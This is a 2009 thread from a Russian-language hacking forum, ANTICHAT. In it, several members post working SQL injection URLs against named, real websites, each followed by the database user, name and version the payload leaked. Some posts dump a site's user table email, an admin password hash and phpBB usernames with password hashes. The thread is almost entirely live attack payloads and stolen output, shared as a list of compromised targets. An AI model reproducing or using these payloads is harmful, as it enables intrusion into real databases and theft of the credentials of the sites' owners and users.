HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.03.2009, 12:16
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

завтрак
Цитата:
http://www.communityservice.wustl.edu/groups/printout.php?gid=-64'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37/*
User: commserv@localhost
Version: 4.0.14-max
Dbname: commserv

news

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Цитата:
http://www.lib.byu.edu/subsutility/viewGuide.php?gid=-364+union+select+1,version()--
Dbname: byudbs
Username: byudbs@web1.lib.byu.edu
Version: 5.0.26-log

Последний раз редактировалось jokester; 27.03.2009 в 13:13.. Причина: Лентяй он )
 
Ответить с цитированием

  #2  
Старый 27.03.2009, 13:05
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.karcherbg.com/newsview.php?id=-21+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6


Database Version: 5.0.67-community
Database name: karcherb_karcher
User name: karcherb_site@localhost


http://www.nmkconsult.com/services_details.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5


Database Version: 5.0.67-community
Database name: nmkconsu_NMKCONSULT
User name: nmkconsu_site@localhost


Интересное дело, так как на сайте не было динамического параметра типа id= , я нашел вкладку новостей, но там всего лишь одна новость поэтому выглядело просто news.php , подтставил news.php?id=1 а дальше уже по класической схеме раскрутил скулю.

http://www.ekip6.net/bg/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9

Database Version: 5.0.67-community-log
Database name: ekip6ne_Ekip6
User name: ekip6ne_site@localhost

Последний раз редактировалось Gorev; 27.03.2009 в 13:15..
 
Ответить с цитированием

  #3  
Старый 27.03.2009, 14:50
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Код:
http://www.harryhomers.co.uk/et/stats/hhs/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
harry_headsh@localhost:harry_statshhs:5.0.67-community

Код:
http://whetstats.sonyonline.de/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
U480002@jenkins.storB480002:5.0.67-log

Код:
http://lapdclan.eu/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
lapdceba@localhost:usrdb_lapdceba_stats:5.0.51a

Код:
http://pro-q3dm6.de/27962/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.27

Код:
http://theaodclan.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
theaod_vspuser@localhost:theaod_vsp:5.0.67-community

Код:
http://www.wolfet.fr/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log

Код:
http://vsp.creativehosting.nl/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
vsp@c1n1.86id.nl:vsp:5.0.32-Debian_7etch6-log

Код:
http://afterhourgamers.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
ahgamers_stats@localhost:ahgamers_stats:5.0.67-community

Код:
http://www.exiledunit.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php
exiledun_stats@localhost:exiledun_stats:4.1.22-standard
 
Ответить с цитированием

  #4  
Старый 27.03.2009, 15:22
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

site: kdvorik.ru
Код:
http://www.kdvorik.ru/katalog.php?r=-0+union+select+1,2,3,4,5,concat_ws(0x3a,name,email)+from+users--
database: 4.0.27-max-log
name_database: dvorik
user: dvorik@v46.valuehost.ru
http://www.kdvorik.ru/admin

column: users
log: asvitov
pass:
email: asvitov@avallon.ru
 
Ответить с цитированием

  #5  
Старый 27.03.2009, 15:55
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

Код:
http://www.l-oko.ru/goonline.php?id=-1%27+union+select+1,2,concat_ws(0x3a,user_id,username,user_password),4,5,6,7,8+from+phpbb_users+limit+1,1+--+
 
Ответить с цитированием

  #6  
Старый 27.03.2009, 16:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.tamaltd.com/bg/products.php?gr=-5+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8


Database Version: 4.1.20
Database name: tamaltd
User name: tamaltd@localhost



http://www.farin.bg/medcontent.php?pub=n&med=-5+union+select+1,concat_ws(0x3a,version(),database (),useR())



Database Version: 5.0.32-Debian_7etch5-log
Database name: wdbn
User name: mrtn@localhost
 
Ответить с цитированием

  #7  
Старый 27.03.2009, 16:52
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

http://www.crossroadsdg.com/news_more.php?id=1+union+select+1,concat_ws(0x3a3a 3a,id,username,password),3,4+from+users+--+

Вывод: 3:::admin:::6692e9c358a3031d
 
Ответить с цитированием

  #8  
Старый 27.03.2009, 16:59
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.interay.eu/bg/product.php?brand=in_the_store&id=-9+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33



Database Version: 5.0.67-community
Database name: interay_interay
User name: interay_site@localhost




http://www.briz-bulgarian-properties.bg/en/property_details.php?id=-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),database(),useR()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39


Database Version: 5.0.67-community
Database name: brizbg_BRIZ
User name: brizbg_site@localhost
 
Ответить с цитированием

  #9  
Старый 27.03.2009, 17:06
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+having+1=1--

Вывод: tblProducts.ProductID


http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID+having+1=1--

Вывод: tblProducts.ProductNam


http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID, tblProducts.ProductName+having+1=1--

Вывод: tblProducts.PartNo
 
Ответить с цитированием

  #10  
Старый 27.03.2009, 17:12
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.rollco-bg.com/en/news_pop_en.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),useR())


Database Version: 4.1.22
Database name: webrollco
User name: webrollco@webserv




http://www.longman-bulgaria.com/product.php?id=-137+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),useR()),5,6,7,8,9,10,11,12,13

Database Version: 5.0.67-community
Database name: longman_longman
User name: longman_site@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.